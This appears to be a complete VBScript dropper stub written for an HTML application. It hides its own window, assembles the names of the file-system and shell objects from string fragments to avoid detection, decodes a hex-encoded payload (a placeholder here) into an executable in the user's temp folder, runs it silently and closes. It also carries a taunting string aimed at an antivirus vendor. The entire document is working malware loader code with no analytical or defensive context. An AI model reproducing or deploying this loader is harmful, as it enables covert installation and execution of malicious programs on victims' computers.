<script language=VBScript>
on error resume next
me.Visible =False
zdve="Scri"+"pting"+"."+"Fil"+"eSy"+"stem"+"Obj"+"ect"
Wj0x88="DD"+"XXX"+"YYYY"+"ZZZ"
fFDa2="C"+"C"+"C"
Dw20x88="WSc"+"r"+"ipt."+"She"+"ll"
Ve3g0x88="!!!!!!!!!!!!!!!!!!HEX!!!!!!!!!!!!!!!!!!"
Csdrw="C"+"C"+"C"
Caiw="K"+"A"+"S"+"Pe"+"R"+"LO"+"H"
Set Ox88=CreateObject(Dw20x88)
Scd=Ox88.ExpandEnvironmentStrings("%TEMP%")+"\"+"a58c8a4a.exe"
Set Vdeh=CreateObject(zdve)
Set Vjue0x88=Vdeh.CreateTextFile(Scd,True)
l=len(Ve3g0x88):p=1:while p<l:Vjue0x88.Write(Chr(Int("&H" & Mid(Ve3g0x88,p,2)))):p=p+2:wend
Vjue0x88.Close
Ox88.run(Scd)
self.Close
</script>